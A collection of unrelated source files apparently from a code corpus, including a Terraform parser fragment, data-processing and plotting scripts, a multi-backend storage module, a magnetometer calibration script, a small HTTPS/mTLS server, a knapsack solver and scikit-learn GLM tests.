sorted_conf[attribute] = str(values)
return sorted_conf
@staticmethod
def _clean_parser_types_lst(values: list) -> list:
for i in range(len(values)):
val = values[i]
if isinstance(val, dict):
values[i] = Parser._clean_parser_types(val)
elif isinstance(val, list):
values[i] = Parser._clean_parser_types_lst(val)
elif isinstance(val, str):
if val == 'true':
values[i] = True
elif val == 'false':
values[i] = False
elif isinstance(val, set):
values[i] = Parser._clean_parser_types_lst(list(val))
str_values_in_lst = [val for val in values if isinstance(val, str)]
str_values_in_lst.sort()
result_values = [val for val in values if not isinstance(val, str)]
result_values.extend(str_values_in_lst)
return result_values
@staticmethod
def _serialize_definitions(tf_definitions):
return loads(dumps(tf_definitions, cls=DefinitionsEncoder))
@staticmethod
def get_next_vertices(evaluated_files: list, unevaluated_files: list) -> (list, list):
"""
This function implements a lazy separation of levels for the evaluated files. It receives the evaluated
files, and returns 2 lists:
1. The next level of files - files from the unevaluated_files which have no unresolved dependency (either
no dependency or all dependencies were evaluated).
2. unevaluated - files which have yet to be evaluated, and still have pending dependencies
Let's say we have this dependency tree:
a -> b
x -> b
y -> c
z -> b
b -> c
c -> d
The first run will return [a, y, x, z] as the next level since all of them have no dependencies
The second run with the evaluated being [a, y, x, z] will return [b] as the next level.
Please mind that [c] has some resolved dependencies (from y), but has unresolved dependencies from [b].
The third run will return [c], and the fourth will return [d].
"""
next_level, unevaluated, do_not_eval_yet = [], [], []
for key in unevaluated_files:
found = False
for eval_key in evaluated_files:
if eval_key in key:
found = True
break
if not found:
do_not_eval_yet.append(key.split('[')[0])
unevaluated.append(key)
else:
next_level.append(key)
move_to_uneval = list(filter(lambda k: k.split('[')[0] in do_not_eval_yet, next_level))
for k in move_to_uneval:
next_level.remove(k)
unevaluated.append(k)
return next_level, unevaluated
@staticmethod
def get_module_dependency_map(tf_definitions):
"""
:param tf_definitions, with paths in format 'dir/main.tf[module_dir/main.tf#0]'
:return module_dependency_map: mapping between directories and the location of its module definition:
{'dir': 'module_dir/main.tf'}
:return tf_definitions: with paths in format 'dir/main.tf'
"""
module_dependency_map = {}
copy_of_tf_definitions = {}
dep_index_mapping: Dict[Tuple[str, str], List[str]] = {}
origin_keys = list(filter(lambda k: not k.endswith(']'), tf_definitions.keys()))
unevaluated_keys = list(filter(lambda k: k.endswith(']'), tf_definitions.keys()))
for file_path in origin_keys:
dir_name = os.path.dirname(file_path)
module_dependency_map[dir_name] = [[]]
copy_of_tf_definitions[file_path] = deepcopy(tf_definitions[file_path])
next_level, unevaluated_keys = Parser.get_next_vertices(origin_keys, unevaluated_keys)
while next_level:
for file_path in next_level:
path, module_dependency, module_dependency_num = remove_module_dependency_in_path(file_path)
dir_name = os.path.dirname(path)
current_deps = deepcopy(module_dependency_map[os.path.dirname(module_dependency)])
for dep in current_deps:
dep.append(module_dependency)
if dir_name not in module_dependency_map:
module_dependency_map[dir_name] = current_deps
elif current_deps not in module_dependency_map[dir_name]:
module_dependency_map[dir_name] += current_deps
copy_of_tf_definitions[path] = deepcopy(tf_definitions[file_path])
origin_keys.append(path)
dep_index_mapping.setdefault((path, module_dependency), []).append(module_dependency_num)
next_level, unevaluated_keys = Parser.get_next_vertices(origin_keys, unevaluated_keys)
for key, dep_trails in module_dependency_map.items():
hashes = set()
deduped = []
for trail in dep_trails:
trail_hash = unify_dependency_path(trail)
if trail_hash in hashes:
continue
hashes.add(trail_hash)
deduped.append(trail)
module_dependency_map[key] = deduped
return module_dependency_map, copy_of_tf_definitions, dep_index_mapping
@staticmethod
def get_new_module(
source_dir: str,
module_dependency_map: Dict[str, List[List[str]]],
module_address_map: Dict[Tuple[str, str], str],
external_modules_source_map: Dict[Tuple[str, str], str],
dep_index_mapping: Dict[Tuple[str, str], List[str]],
) -> Module:
return Module(
source_dir=source_dir,
module_dependency_map=module_dependency_map,
module_address_map=module_address_map,
external_modules_source_map=external_modules_source_map,
dep_index_mapping=dep_index_mapping
)
def add_tfvars(self, module, source):
if not self.external_variables_data:
return
for (var_name, default, path) in self.external_variables_data:
if ".tfvars" in path:
block = {var_name: {"default": default}}
module.add_blocks(BlockType.TF_VARIABLE, block, path, source)
def _load_or_die_quietly(file: os.PathLike, parsing_errors: Dict,
clean_definitions: bool = True) -> Optional[Mapping]:
"""
Load JSON or HCL, depending on filename.
:return: None if the file can't be loaded
"""
file_path = os.fspath(file)
file_name = os.path.basename(file_path)
try:
logging.debug(f"Parsing {file_path}")
with open(file_path, "r") as f:
if file_name.endswith(".json"):
return json.load(f)
else:
raw_data = hcl2.load(f)
non_malformed_definitions = validate_malformed_definitions(raw_data)
if clean_definitions:
return clean_bad_definitions(non_malformed_definitions)
else:
return non_malformed_definitions
except Exception as e:
logging.debug(f'failed while parsing file {file_path}', exc_info=e)
parsing_errors[file_path] = e
return None
def _is_valid_block(block):
if not isinstance(block, dict):
return True
# if the block is empty, there's no need to process it further
if len(block) == 0:
return False
entity_name, _ = next(iter(block.items()))
if re.fullmatch(r'[^\W0-9][\w-]*', entity_name):
return True
return False
def validate_malformed_definitions(raw_data):
raw_data_cleaned = raw_data
for block_type, blocks in raw_data.items():
raw_data_cleaned[block_type] = [block for block in blocks if _is_valid_block(block)]
return raw_data_cleaned
def clean_bad_definitions(tf_definition_list):
return {
block_type: list(filter(lambda definition_list: block_type == 'locals' or
not isinstance(definition_list, dict)
or len(definition_list.keys()) == 1,
tf_definition_list[block_type]))
for block_type in tf_definition_list.keys()
}
def _to_native_value(value: str) -> Any:
if value.startswith('"') or value.startswith("'"):
return value[1:-1]
else:
return eval_string(value)
def _remove_module_dependency_in_path(path):
"""
:param path: path that looks like "dir/main.tf[other_dir/x.tf#0]
:return: only the outer path: dir/main.tf
"""
resolved_module_pattern = r'\[.+\#.+\]'
if re.findall(resolved_module_pattern, path):
path = re.sub(resolved_module_pattern, '', path)
return path
def _safe_index(sequence_hopefully, index) -> Optional[Any]:
try:
return sequence_hopefully[index]
except IndexError as e:
logging.debug(f'Failed to parse index int ({index}) out of {sequence_hopefully}')
logging.debug(e, stack_info=True)
return None
def is_acceptable_module_param(value: Any) -> bool:
"""
This function determines if a value should be passed to a module as a parameter. We don't want to pass
unresolved var, local or module references because they can't be resolved from the module, so they need
to be resolved prior to being passed down.
"""
value_type = type(value)
if value_type is dict:
for k, v in value.items():
if not is_acceptable_module_param(v) or not is_acceptable_module_param(k):
return False
return True
if value_type is set or value_type is list:
for v in value:
if not is_acceptable_module_param(v):
return False
return True
if not value_type is str:
return True
for vbm in find_var_blocks(value):
if vbm.is_simple_var():
return False
return True
|
the-stack_106_22156
|
import pandas as pd
import os
import sys
#data=pd.read_excel(sys.argv[1])
data=pd.read_excel('/Users/siaga/Desktop/processedData.xlsx')
mass=set()
basket=pd.DataFrame()
excelList=os.listdir('/Users/siaga/Desktop/NFT')
for i in excelList:
i=i.replace('.xlsx','')
i=i.replace('-','_')
locals()['data'+i]=data[['mass'+i,i]].dropna()
mass.update(data['mass'+i])
mass = {x for x in mass if pd.notna(x)}
for m in excelList:
m=m.replace('.xlsx','')
m=m.replace('-','_')
locals()['masse'+m]=mass-set(data['mass'+m])
locals()['masse'+m]=pd.DataFrame(locals()['masse'+m],columns=['mass'+m])
locals()['data'+m]=pd.concat([locals()['data'+m],locals()['masse'+m]],ignore_index=True,sort=False).fillna(0)
locals()['data'+m]=locals()['data'+m].sort_values(by=['mass'+m])
locals()['data' + m]=locals()['data'+m].reset_index(drop=True)
basket=pd.concat([basket,locals()['data'+m]],axis=1,sort=False)
basket=basket.rename(columns={'massL5_450':"mtoz"})
for column in basket:
if 'mass' in column:
del basket[column]
basket[['mtoz','formula']]=basket['mtoz'].str.split(',',expand=True)
basket['mtoz']=basket['mtoz'].astype(float)
basket=basket.sort_values(by=['mtoz'])
basket.to_excel('/Users/siaga/Desktop/pca_processed.xlsx',index=False)
# data.to_excel('/Users/siaga/Desktop/pca_processed.xlsx')
# masse1=pd.DataFrame(masse1,columns=['mass1'])
# data1=pd.concat([data1,masse1],ignore_index=True,sort=False).fillna(0)
# data1=data1.sort_values(by=['mass1'])
# masse2=pd.DataFrame(masse2,columns=['mass2'])
# masse3=pd.DataFrame(masse3,columns=['mass3'])
# masse4=pd.DataFrame(masse4,columns=['mass4'])
# masse5=pd.DataFrame(masse5,columns=['mass5'])
# masse6=pd.DataFrame(masse6,columns=['mass6'])
# data=pd.concat([data,masse1,masse2,masse3,masse4,masse5,masse6],ignore_index=True,sort=False)
# data.to_excel('/Users/siaga/Desktop/pca_processed.xlsx')
|
the-stack_106_22157
|
"""
Options for Streamlit widgets.
"""
style_gan_choices = [
"faces (ffhq slim 256x256)",
"lsun cats",
"wildlife",
"my little pony",
"grumpy cat",
"lsun cars",
"beetles",
"more abstract art",
"obama",
"abstract photos",
"horse",
"cakes",
"car (config-e)",
"painting faces",
"butterflies",
"faces (ffhq config-e)",
"microscope images",
"ukiyo-e faces",
"cifar 10",
"car (config-f)",
"wikiart faces",
"wikiart",
"figure drawings",
"cat",
"anime portraits",
"anime faces",
"fireworks",
"celeba hq faces",
"textures",
"fursona",
"faces (ffhq config-f 512x512)",
"trypophobia",
"abstract art",
"floor plans",
"ukiyoe faces",
"cifar 100",
"panda",
"church",
"maps",
"ffhq faces",
"lsun bedrooms",
"pokemon",
"imagenet",
"modern art",
"vases",
"flowers",
"faces (ffhq config-e 256x256)",
"doors",
"faces (ffhq config-f)",
]
|
the-stack_106_22160
|
import os
from os import path, makedirs, listdir
import sys
import numpy as np
np.random.seed(1)
import random
random.seed(1)
import torch
from torch import nn
from torch.backends import cudnn
from torch.autograd import Variable
import pandas as pd
from tqdm import tqdm
import timeit
import cv2
from sklearn.model_selection import train_test_split
from zoo.models import SeResNext50_Unet_Double
from utils import *
cv2.setNumThreads(0)
cv2.ocl.setUseOpenCL(False)
test_dir = 'test/images'
models_folder = 'weights'
all_files = np.array(get_files())
val_idxs = train_test_split(np.arange(len(all_files)).astype(int), test_size=0.1, random_state=0)[1]
all_files= all_files[val_idxs]
if __name__ == '__main__':
t0 = timeit.default_timer()
seed = int(sys.argv[1])
vis_dev = sys.argv[2]
# os.environ['CUDA_DEVICE_ORDER'] = 'PCI_BUS_ID'
os.environ["CUDA_VISIBLE_DEVICES"] = vis_dev
pred_folder = 'res50cls_cce_{}_tuned'.format(seed)
makedirs(pred_folder, exist_ok=True)
# cudnn.benchmark = True
models = []
# for seed in [1]:
snap_to_load = 'res50_cls_cce_{}_0_best'.format(seed)
model = SeResNext50_Unet_Double().cuda()
model = nn.DataParallel(model).cuda()
print("=> loading checkpoint '{}'".format(snap_to_load))
checkpoint = torch.load(path.join(models_folder, snap_to_load), map_location='cpu')
loaded_dict = checkpoint['state_dict']
sd = model.state_dict()
for k in model.state_dict():
if k in loaded_dict and sd[k].size() == loaded_dict[k].size():
sd[k] = loaded_dict[k]
loaded_dict = sd
model.load_state_dict(loaded_dict)
print("loaded checkpoint '{}' (epoch {}, best_score {})"
.format(snap_to_load, checkpoint['epoch'], checkpoint['best_score']))
model.eval()
models.append(model)
with torch.no_grad():
for fn in tqdm(sorted(all_files)):
if '_pre_' in fn:
f = os.path.basename(fn)
img = cv2.imread(fn, cv2.IMREAD_COLOR)
img2 = cv2.imread(fn.replace('_pre_', '_post_'), cv2.IMREAD_COLOR)
img = np.concatenate([img, img2], axis=2)
img = preprocess_inputs(img)
inp = []
inp.append(img)
inp.append(img[::-1, ...])
inp.append(img[:, ::-1, ...])
inp.append(img[::-1, ::-1, ...])
inp = np.asarray(inp, dtype='float')
inp = torch.from_numpy(inp.transpose((0, 3, 1, 2))).float()
inp = Variable(inp).cuda()
pred = []
for model in models:
msk = model(inp)
msk = torch.softmax(msk[:, :, ...], dim=1)
msk = msk.cpu().numpy()
msk[:, 0, ...] = 1 - msk[:, 0, ...]
pred.append(msk[0, ...])
pred.append(msk[1, :, ::-1, :])
pred.append(msk[2, :, :, ::-1])
pred.append(msk[3, :, ::-1, ::-1])
pred_full = np.asarray(pred).mean(axis=0)
msk = pred_full * 255
msk = msk.astype('uint8').transpose(1, 2, 0)
cv2.imwrite(path.join(pred_folder, '{0}.png'.format(f.replace('.jpg', '_part1.png'))), msk[..., :3], [cv2.IMWRITE_PNG_COMPRESSION, 9])
cv2.imwrite(path.join(pred_folder, '{0}.png'.format(f.replace('.jpg', '_part2.png'))), msk[..., 2:], [cv2.IMWRITE_PNG_COMPRESSION, 9])
elapsed = timeit.default_timer() - t0
print('Time: {:.3f} min'.format(elapsed / 60))
|
the-stack_106_22161
|
import csv
with open('graphs/class1.csv', newline='') as f:
reader = csv.reader(f)
file_data = list(reader)
#To remove headers from CSV
file_data.pop(0)
total_marks = 0
total_entries = len(file_data)
for marks in file_data:
total_marks += float(marks[1])
mean = total_marks / total_entries
print("Mean (Average) is -> "+str(mean))
import pandas as pd
import plotly.express as px
df = pd.read_csv("graphs/class1.csv")
fig = px.scatter(df, x="Student Number",
y="Marks"
)
fig.update_layout(shapes=[
dict(
type= 'line',
y0= mean, y1= mean,
x0= 0, x1= total_entries
)
])
fig.update_yaxes(rangemode="tozero")
fig.show()
|
the-stack_106_22164
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import, unicode_literals
from contextlib import contextmanager
from logging import getLogger
import os
from tempfile import TemporaryFile
import mimetypes
from future.standard_library import install_aliases
install_aliases()
from urllib.parse import urlparse, urljoin
from urllib.request import urlopen, Request
from urllib.error import HTTPError
logger = getLogger(__name__)
def get_storage(dirname, **kwargs):
result = urlparse(dirname)
if not result.scheme:
return FileSystemStorage(dirname, **kwargs)
elif result.scheme == 's3':
return S3Storage(result.netloc, result.path, **kwargs)
elif result.scheme == 'hdfs':
return HdfsStorage(result.netloc, result.path, **kwargs)
else:
return UrlStorage(dirname, **kwargs)
def _get_mime(filename):
filetype, encoding = mimetypes.guess_type(filename)
return filetype
class _BaseStorage(object):
def open(self, key):
raise NotImplementedError
def get(self, key):
raise NotImplementedError
def exists(self, key):
raise NotImplementedError
def put(self, key, value):
raise NotImplementedError
def delete(self, key):
raise NotImplementedError
def list(self):
raise NotImplementedError
def url(self, path=''):
raise NotImplementedError
class FileSystemStorage(_BaseStorage):
def __init__(self, path):
self.basedir = path
if not self.basedir:
self.basedir = '.'
def _ensure_dir(self, dirname):
if not os.path.exists(dirname):
logger.debug('Creating {}'.format(dirname))
os.makedirs(dirname)
@contextmanager
def open(self, filename, mode='rb'):
path = os.path.join(self.basedir, filename)
if mode.startswith('w'):
self._ensure_dir(os.path.dirname(path))
with open(path, mode) as f:
yield f
def get(self, filename, mode='rb'):
with self.open(filename, mode=mode) as f:
return f.read()
def exists(self, filename):
return os.path.exists(os.path.join(self.basedir, filename))
def put(self, filename, value, mode='wb'):
with self.open(filename, mode=mode) as f:
f.write(value)
def delete(self, filename, **kwargs):
os.remove(os.path.join(self.basedir, filename))
def list(self):
for path in os.listdir(self.basedir):
yield path
def url(self, path=''):
return os.path.abspath(os.path.join(self.basedir, path))
class S3Storage(_BaseStorage):
def __init__(self, bucket, key_prefix='', **kwargs):
import boto3
self.bucket = boto3.resource('s3').Bucket(bucket)
self.key_prefix = key_prefix.lstrip('/')
self.options = dict(ACL='public-read')
self.options.update(kwargs)
@contextmanager
def open(self, key, mode='rb', **kwargs):
key = os.path.join(self.key_prefix, key)
if mode.startswith('r'):
with TemporaryFile() as f:
self.bucket.download_fileobj(key, f, **kwargs)
f.seek(0)
yield f
elif mode.startswith('w'):
with TemporaryFile() as f:
yield f
f.seek(0)
self.bucket.upload_fileobj(f, key, **kwargs)
else:
raise ValueError('Unsupported mode {}'.format(mode))
def get(self, key, **kwargs):
with self.open(key, **kwargs) as f:
return f.read()
def exists(self, key):
import botocore
key = os.path.join(self.key_prefix, key)
exists = True
try:
self.bucket.Object(key).load()
except botocore.exceptions.ClientError as e:
if e.response['Error']['Code'] == '404':
exists = False
else:
raise
return exists
def put(self, key, value, **kwargs):
key = os.path.join(self.key_prefix, key)
options = dict(self.options)
options.update(kwargs)
self.bucket.Object(key).put(
Body=value, ContentType=_get_mime(key),
ContentDisposition='inline; filename="{}"'.format(
os.path.basename(key)),
**options)
def delete(self, key, **kwargs):
key = os.path.join(self.key_prefix, key)
self.bucket.Object(key).delete(**kwargs)
def list(self):
for obj in self.bucket.objects.filter(Prefix=self.key_prefix):
yield obj.key.replace(self.key_prefix, "").lstrip('/')
def url(self, path=''):
return ('s3://' + self.bucket.name + '/' +
os.path.normpath(os.path.join(self.key_prefix, path)))
class HdfsStorage(_BaseStorage):
def __init__(self, namenode, path, use_trash=False, effective_user=None,
use_sasl=True, hdfs_namenode_principal='hdfs',
use_datanode_hostname=False):
from snakebite.client import HAClient
from snakebite.namenode import Namenode
self.path = path
namenodes = [Namenode(namenode)]
self._client = HAClient(
namenodes,
use_trash=use_trash,
effective_user=effective_user,
use_sasl=use_sasl,
hdfs_namenode_principal=hdfs_namenode_principal,
use_datanode_hostname=use_datanode_hostname
)
@contextmanager
def open(self, filename, mode='rb', **kwargs):
path = '{0}/{1}'.format(self.path, filename)
if mode.startswith('r'):
stream = self._hdfs_file_stream(path)
try:
yield stream
finally:
stream.close()
elif mode.startswith('w'):
raise NotImplementedError
else:
raise ValueError('Unsupported mode {}'.format(mode))
def _hdfs_file_stream(self, path):
try:
from cStringIO import StringIO
except:
from StringIO import StringIO
generator = self._client.cat([path]).next()
buf = StringIO()
for i in generator:
buf.write(i)
buf.seek(0)
return buf
def get(self, path, **kwargs):
with self._hdfs_file_stream(path) as f:
return f.getvalue()
class UrlStorage(_BaseStorage):
def __init__(self, base_url, **kwargs):
self.base_url = base_url
@contextmanager
def open(self, path, **kwargs):
url = os.path.join(self.base_url, path)
with TemporaryFile() as f:
with urlopen(url, **kwargs) as response:
f.write(response.read())
f.seek(0)
yield f
def get(self, path, **kwargs):
with self.open(path, **kwargs) as f:
return f.read()
def exists(self, path):
url = os.path.join(self.base_url, path)
request = Request(url, method='HEAD')
exists = True
try:
urlopen(request)
except HTTPError:
exists = False
return exists
def url(self, path=''):
return urljoin(self.base_url, path)
|
the-stack_106_22167
|
# This code calibrates magnetometer. Please add the scale values to the other file codes when imu_algorithms are used.
from modules.mpulib import computeheading, attitudefromCompassGravity
import socket, traceback
import csv
import struct
import sys, time, string, pygame
import pygame
import pygame.draw
import pygame.time
import numpy as np
from math import sin, cos, acos
from modules.euclid import Vector3, Quaternion
from modules.EuclidObjects import Cube, Screen, Grid, PerspectiveScreen
import math
# from pygame.locals import *
# from ponycube import *
from modules.madgwickahrs import *
import modules.quaternion
from modules.quaternion import QuaternionClass
from modules.a3muse import quatNormalized, IntegrationRK4, EulerToQuat, AccMagOrientation, headingfromMag, QuatToEuler, angle_between, QuatToRotMat, AxisAngleToRotMat, RotMatToQuat
from math import atan2, atan
from numpy.linalg import inv
from numpy import linalg as LA
import matplotlib.pyplot as plt
# import euclid
filename = open('mag_values_for_calibration.txt','w')
i = 0
import serial
ser = serial.Serial('/dev/tty.usbmodem14611')
ser.baudrate = 115200
ser.timeout = 3
# reading: time, mx, my, mz, heading
while i < 2000 :
reading = ser.readline()
print(reading)
#print(reading)
sp = str(reading).split(',')
# print(sp)
time = float(sp[0][2:].strip())
mx = float(sp[7].strip())
my = float(sp[8].strip())
mz = float(sp[9].strip())
mag = [mx, my, mz]
print(i)
print(mag)
print(mx, my, mz, file = filename)
i = i + 1
print("calibration done")
filename.close()
filename = open('mag_calib.txt','r')
mx = []
my = []
mz = []
for i in filename:
sp = i.split()
mx.append(float(sp[0]))
my.append(float(sp[1]))
mz.append(float(sp[2]))
# print(sp[0])
filename.close()
offset_mx = (max(mx) + min(mx)) / 2
offset_my = (max(my) + min(my)) / 2
offset_mz = (max(mz) + min(mz)) / 2
print("offset_mx = ",offset_mx)
print("offset_my = ", offset_my)
print("offset_mz = ", offset_mz)
cmx = []
cmy = []
cmz = []
# print(mx)
# print(len(mx))
for k in range(len(mx)):
cmx.append(mx[k] - offset_mx)
cmy.append(my[k] - offset_my)
cmz.append(mz[k] - offset_mz)
avg_delta_mx = (max(cmx) - min(cmx)) / 2
avg_delta_my = (max(cmy) - min(cmy)) / 2
avg_delta_mz = (max(cmz) - min(cmz)) / 2
avg_delta = (avg_delta_mx + avg_delta_my + avg_delta_mz) / 3
scale_mx = avg_delta / avg_delta_mx
scale_my = avg_delta / avg_delta_my
scale_mz = avg_delta / avg_delta_mz
print("scale_mx = ", scale_mx)
print("scale_my = ", scale_my)
print("scale_mz = ", scale_mz)
smx = []
smy = []
smz = []
for k in range(len(cmx)):
smx.append(cmx[k]*scale_mx)
smy.append(cmy[k]*scale_my)
smz.append(cmz[k]*scale_mz)
plt.plot(mx, my, '.')
plt.plot(my, mz, '.')
plt.plot(mx, mz, '.')
plt.title("mxyz")
plt.show()
plt.plot(cmx, cmy, '.')
plt.plot(cmy, cmz, '.')
plt.plot(cmx, cmz, '.')
plt.title("cmxyz")
plt.show()
plt.plot(smx, smy, '.')
plt.plot(smy, smz, '.')
plt.plot(smx, smz, '.')
plt.title("smxyz")
plt.show()
|
the-stack_106_22168
|
#!/usr/bin/env python3
import os
import ssl
import argparse
from socketserver import ThreadingMixIn
from http.server import BaseHTTPRequestHandler, HTTPServer
parser = argparse.ArgumentParser(prog="server", description="Python HTTPS Server")
parser.add_argument(
"-m",
"--mtls",
dest="mtls",
action="store_true",
help="Enable mTLS server requirement",
)
parser.add_argument(
"-d",
"--domain",
dest="domain",
type=str,
help="Domain name",
)
parser.add_argument(
"-p",
"--port",
dest="port",
type=int,
help="Port number",
default=443,
)
parser.add_argument(
"-r",
"--cacert",
dest="cacert",
type=str,
help="Provide custom CA Root Certificate",
)
parser.add_argument(
"-c",
"--cert",
dest="cert",
type=str,
help="Provide your domain certificate",
)
parser.add_argument(
"-k",
"--key",
dest="key",
type=str,
help="Provide your domain certificate's private key",
)
args = parser.parse_args()
MTLS: bool = args.mtls
MTLS_ACTIVE_STRING: str = MTLS and "with" or "without"
class SimpleServer(BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(200)
self.send_header("content-type", "text/html; charset=utf-8")
self.end_headers()
if MTLS:
message = b"\xf0\x9f\x91\x8b Hello, world with mTLS!\n"
else:
message = b"\xf0\x9f\x91\x8b Hello, world!\n"
self.wfile.write(message)
class ThreadingSimpleServer(ThreadingMixIn, HTTPServer):
...
if __name__ == "__main__":
server = ThreadingSimpleServer(("", args.port), SimpleServer)
HOSTNAME: str = os.uname().nodename
DOMAIN: str = args.domain or f"{HOSTNAME}.local"
PORT: str = args.port != 443 and f":{args.port}" or ""
context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
context.load_verify_locations(cafile=args.cacert)
context.load_cert_chain(certfile=args.cert, keyfile=args.key)
context.verify_mode = MTLS and ssl.CERT_REQUIRED or ssl.CERT_OPTIONAL
with context.wrap_socket(sock=server.socket, server_side=True) as sock:
try:
server.socket = sock
print(f"Server started https://{DOMAIN}{PORT} {MTLS_ACTIVE_STRING} mTLS")
server.serve_forever()
except KeyboardInterrupt:
pass
print("\rServer exited")
|
the-stack_106_22174
|
from torch import nn, Tensor
class SpatialAttention(nn.Module):
def __init__(self, input_size: int):
super().__init__()
self.conv1 = nn.Sequential(
nn.Conv2d(input_size, input_size // 2, kernel_size=3, stride=1, padding=1),
nn.BatchNorm2d(input_size // 2),
nn.ReLU()
)
self.conv2 = nn.Sequential(
nn.Conv2d(input_size // 2, input_size // 4, kernel_size=3, stride=1, padding=1),
nn.BatchNorm2d(input_size // 4),
nn.ReLU()
)
self.conv3 = nn.Sequential(
nn.Conv2d(input_size // 4, 1, kernel_size=3, stride=1, padding=1),
nn.Sigmoid()
)
def forward(self, x: Tensor) -> Tensor:
""" Computes a spatial attention mask with values in [0, 1] for the given input image """
x = self.conv1(x)
x = self.conv2(x)
x = self.conv3(x)
return x
|
the-stack_106_22177
|
import operator
import numpy as np
from cvxpy import *
from knapsack.hyper.multiple import problem
def ksp_solve_lp_relaxed_convex(costs, weights, sizes):
x = Variable(len(sizes), len(costs))
weights_param = Parameter(rows=len(sizes), cols=len(costs))
weights_param.value = np.asarray(weights)
costs_param = Parameter(len(costs))
costs_param.value = costs
constr = [diag(x * weights_param.T) < sizes, sum_entries(x, axis=0).T <= [1] * len(costs), 0 < x, x < 1]
objective = Maximize(sum_entries(x * costs_param))
solution = Problem(objective, constr).solve()
return solution
def ksp_solve_lp_relaxed_greedy(costs, weights, sizes):
costs = np.asarray(costs)
weights = np.asarray(weights)
sizes = np.asarray(sizes)
included = np.zeros((len(sizes), len(costs)))
for ksp_index, weight in enumerate(weights):
current_characteristics = filter(lambda x: np.sum(included, axis=0)[x[0]] < 1, enumerate(costs / weight))
current_characteristics = list(sorted(current_characteristics, key=operator.itemgetter(1)))
top_median = []
top_items_characteristics_indexes = list(map(operator.itemgetter(0), current_characteristics))
while len(top_items_characteristics_indexes) > 0 and \
np.sum(weight[top_median + [
top_items_characteristics_indexes[len(top_items_characteristics_indexes) - 1]]]) < sizes[
ksp_index]:
top_median.append(top_items_characteristics_indexes.pop())
if len(top_items_characteristics_indexes) == 0:
included[ksp_index][top_median] = np.ones((1, len(top_median))) - np.sum(included, axis=0)[top_median]
break
median_index = top_items_characteristics_indexes.pop()
rest = (sizes[ksp_index] - np.sum(weight[top_median])) / weight[median_index]
included[ksp_index][top_median] = np.ones((1, len(top_median))) - np.sum(included, axis=0)[top_median]
included[ksp_index][median_index] = min(1 - np.sum(included, axis=0)[median_index], rest)
return problem.solve(included, costs, weights, sizes), included
if __name__ == '__main__':
optimal_selection = [[1, 0, 0, 1, 0, 0, 0, 0, 0, 0], [0, 1, 1, 0, 0, 0, 1, 0, 0, 0]]
costs = [92, 57, 49, 68, 60, 43, 67, 84, 87, 72]
weights = [[23, 31, 29, 44, 53, 38, 63, 85, 89, 82],
[23, 31, 29, 44, 53, 38, 63, 85, 89, 82]]
sizes = [70, 127]
optimal_cost = problem.solve(optimal_selection, costs, weights, sizes)
print(ksp_solve_lp_relaxed_greedy(costs, weights, sizes))
|
the-stack_106_22182
|
# -*- coding: utf-8 -*-
# AtCoder Beginner Contest
def main():
n, t = list(map(int, input().split()))
a = [int(input()) for _ in range(n)]
duration = t
# See:
# https://beta.atcoder.jp/contests/abc024/submissions/2841120
for i in range(1, n):
duration += min(t, a[i] - a[i - 1])
print(duration)
if __name__ == '__main__':
main()
|
the-stack_106_22183
|
# Authors: Christian Lorentzen <[email protected]>
#
# License: BSD 3 clause
import numpy as np
from numpy.testing import assert_allclose
import pytest
import warnings
from sklearn.datasets import make_regression
from sklearn.linear_model._glm import GeneralizedLinearRegressor
from sklearn.linear_model import TweedieRegressor, PoissonRegressor, GammaRegressor
from sklearn.linear_model._glm.link import (
IdentityLink,
LogLink,
)
from sklearn._loss.glm_distribution import (
TweedieDistribution,
NormalDistribution,
PoissonDistribution,
GammaDistribution,
InverseGaussianDistribution,
)
from sklearn.linear_model import Ridge
from sklearn.exceptions import ConvergenceWarning
from sklearn.model_selection import train_test_split
@pytest.fixture(scope="module")
def regression_data():
X, y = make_regression(
n_samples=107, n_features=10, n_informative=80, noise=0.5, random_state=2
)
return X, y
def test_sample_weights_validation():
"""Test the raised errors in the validation of sample_weight."""
# scalar value but not positive
X = [[1]]
y = [1]
weights = 0
glm = GeneralizedLinearRegressor()
# Positive weights are accepted
glm.fit(X, y, sample_weight=1)
# 2d array
weights = [[0]]
with pytest.raises(ValueError, match="must be 1D array or scalar"):
glm.fit(X, y, weights)
# 1d but wrong length
weights = [1, 0]
msg = r"sample_weight.shape == \(2,\), expected \(1,\)!"
with pytest.raises(ValueError, match=msg):
glm.fit(X, y, weights)
@pytest.mark.parametrize(
"name, instance",
[
("normal", NormalDistribution()),
("poisson", PoissonDistribution()),
("gamma", GammaDistribution()),
("inverse-gaussian", InverseGaussianDistribution()),
],
)
def test_glm_family_argument(name, instance):
"""Test GLM family argument set as string."""
y = np.array([0.1, 0.5]) # in range of all distributions
X = np.array([[1], [2]])
glm = GeneralizedLinearRegressor(family=name, alpha=0).fit(X, y)
assert isinstance(glm._family_instance, instance.__class__)
glm = GeneralizedLinearRegressor(family="not a family")
with pytest.raises(ValueError, match="family must be"):
glm.fit(X, y)
@pytest.mark.parametrize(
"name, instance", [("identity", IdentityLink()), ("log", LogLink())]
)
def test_glm_link_argument(name, instance):
"""Test GLM link argument set as string."""
y = np.array([0.1, 0.5]) # in range of all distributions
X = np.array([[1], [2]])
glm = GeneralizedLinearRegressor(family="normal", link=name).fit(X, y)
assert isinstance(glm._link_instance, instance.__class__)
glm = GeneralizedLinearRegressor(family="normal", link="not a link")
with pytest.raises(ValueError, match="link must be"):
glm.fit(X, y)
@pytest.mark.parametrize(
"family, expected_link_class",
[
("normal", IdentityLink),
("poisson", LogLink),
("gamma", LogLink),
("inverse-gaussian", LogLink),
],
)
def test_glm_link_auto(family, expected_link_class):
# Make sure link='auto' delivers the expected link function
y = np.array([0.1, 0.5]) # in range of all distributions
X = np.array([[1], [2]])
glm = GeneralizedLinearRegressor(family=family, link="auto").fit(X, y)
assert isinstance(glm._link_instance, expected_link_class)
@pytest.mark.parametrize("alpha", ["not a number", -4.2])
def test_glm_alpha_argument(alpha):
"""Test GLM for invalid alpha argument."""
y = np.array([1, 2])
X = np.array([[1], [2]])
glm = GeneralizedLinearRegressor(family="normal", alpha=alpha)
with pytest.raises(ValueError, match="Penalty term must be a non-negative"):
glm.fit(X, y)
@pytest.mark.parametrize("fit_intercept", ["not bool", 1, 0, [True]])
def test_glm_fit_intercept_argument(fit_intercept):
"""Test GLM for invalid fit_intercept argument."""
y = np.array([1, 2])
X = np.array([[1], [1]])
glm = GeneralizedLinearRegressor(fit_intercept=fit_intercept)
with pytest.raises(ValueError, match="fit_intercept must be bool"):
glm.fit(X, y)
